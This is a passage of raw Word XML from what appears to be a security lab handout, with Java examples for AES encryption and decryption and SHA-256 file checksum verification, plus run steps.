          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import javax.crypto.Cipher;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javax.crypto.KeyGenerator; import javax.crypto.SecretKey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2119FA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="454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javax.crypto.spec.SecretKeySpec; import java.util.Base64;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EE75C6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"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AESEncryption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1C28DA44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final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AES_ALGORITHM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"AES";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664A120E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A39B7F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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 xml:space="preserve"> Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19912D02" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2040" w:right="783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SecretKey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generateKey()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 KeyGenerator keyGenerator =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71785F58" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="3449" w:hanging="96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KeyGenerator.getInstance(AES_ALGORITHM); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>keyGenerator.init(128);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AES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size return keyGenerator.generateKey();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EEA6F5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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B87E5BD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="224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5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> AES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17854A3F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="108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encrypt(String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data,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SecretKey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key)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 Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7E0A68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Cipher.getInstance(AES_ALGORITHM); cipher.init(Cipher.ENCRYPT_MODE, key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51622879" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="1143"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>byte[] encryptedBytes = cipher.doFinal(data.getBytes()); return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Base64.getEncoder().encodeToString(encryptedBytes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB78AFD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225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55BEE5E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D4598C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5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> AES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577C420D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="108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decrypt(String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encryptedData,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SecretKey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key) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FEBFAB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="533" w:right="89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Cipher.getInstance(AES_ALGORITHM);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0BDFE2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:jc w:val="center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98B5FE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="2040" w:right="344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cipher.init(Cipher.DECRYPT_MODE,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key); byte[] decryptedBytes =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438AC9C2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2040" w:right="2222" w:hanging="96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cipher.doFinal(Base64.getDecoder().decode(encryptedData)); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>return new String(decryptedBytes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6AF450" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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82B7CED" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27645E1A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2040" w:right="1143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 SecretKey key = generateKey();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507AC24B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originalData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"SensitiveData123";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C8F97" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225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 encryptedData = encrypt(originalData, key); System.out.println("Encrypted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Data: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encryptedData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159D4D41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4EA96F55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 decryptedData = decrypt(encryptedData, key); System.out.println("Decrypted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Data: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decryptedData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5520FCF9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225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D95C847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631343F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48AE1074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58BA1B7D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50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program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD7315" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF4E350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AESEncryption.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C1697A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4BF838FF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Run the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF7A03" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E883BB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AESEncryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D127113" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7788E56D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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the encrypted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decrypted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14:paraId="59D68CCB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E42DE0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Securely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0B3F4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="273"/>
        <w:ind w:left="1079" w:hanging="359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database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC47FB7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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and decrypt data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>securely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needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566474C8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E10CAC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62B01187" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>◻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encrypts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decrypts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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AES,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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secure storage and retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D493A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0F001A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593"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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SHA-256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>checksum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4283AA9B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5034C8E2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140B785F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="426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SHA-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>checksum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downloaded file to ensure its integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17158811" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3011A674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302B856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10A9DBB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5F5FF69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checksum </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84E921" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F0A01C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323B153C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FAA6814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SHA-256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Checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67679377" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48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SHA-256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2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generates a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256-bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B913205" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>used to verify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downloading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C38B1F9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0610743A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SHA-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Checksum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4"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40479595" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15425E08" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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FileChecksum.java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SHA-256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hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1E17C6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5382C99D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java.io.File;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7D7F33" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="5038"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import java.io.FileInputStream;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java.security.MessageDigest; import java.util.Formatter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7885A855" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A97B8CB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"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FileChecksum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69991D95" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040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calculateSHA256(File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 MessageDigest digest = MessageDigest.getInstance("SHA-256"); FileInputStream fis = new FileInputStream(file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3210D52A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="4139"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>byte[]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byteArray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byte[1024]; int bytesRead;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACE85A6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="2520" w:hanging="48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((bytesRead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fis.read(byteArray))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-1)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 digest.update(byteArray, 0, bytesRead);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE9FF87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EFCD028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fis.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CA80F2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="2040" w:right="4139"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>byte[]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hashBytes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digest.digest(); return bytesToHex(hashBytes);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC1ABD7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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2EA2E7A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6D05A9DA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="2222" w:hanging="480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bytesToHex(byte[]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bytes)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 Formatter formatter = new Formatter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D51FE7F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2520" w:right="3449" w:hanging="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>for (byte b : bytes) { formatter.format("%02x",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b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9D00B7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="20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B313743" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="2222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result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formatter.toString(); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>formatter.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21C375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result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C54293C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3BEB272" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact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D09C7A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83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4F0FBEB9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"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File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File("sample.txt");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Replace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actual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4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A14A736" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact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5F7A96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path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEEC0A1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="226"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6460CF4E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="righ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0FDD60C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55098E15" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="320" w:right="2158"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>String checksum = calculateSHA256(file); System.out.println("SHA-256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Checksum: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checksum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9CA20E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr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80" w:space="40"/>
            <w:col w:w="8720"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1601D88B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FDCFDB9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3BFE8902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2EDAF3A9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46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program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C25D62" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B853AE9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FileChecksum.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2131F355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1450D2EE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 xml:space="preserve">Run the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB8C023" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AFEA15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FileChecksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB43311" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="581814BA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 SHA-256 hash output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file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDFFFA9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625FB2EF" w14:textId="77777777" w:rsidR="00A16F47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Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C60720A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45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 generated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SHA-256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checksum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downloaded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6B039CBB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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If they</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>match,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 is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>intact; if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>not,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corrupted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tampered </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A0AD7F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232C827B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7D967C00" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>◻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verifies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SHA-256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>checksum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file, ensuring its integrity after downloading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11200B9B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/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69F9AD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575"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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 xml:space="preserve">data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9C1673" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081600E3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4F2CC667" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783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 xml:space="preserve">data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C43144" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
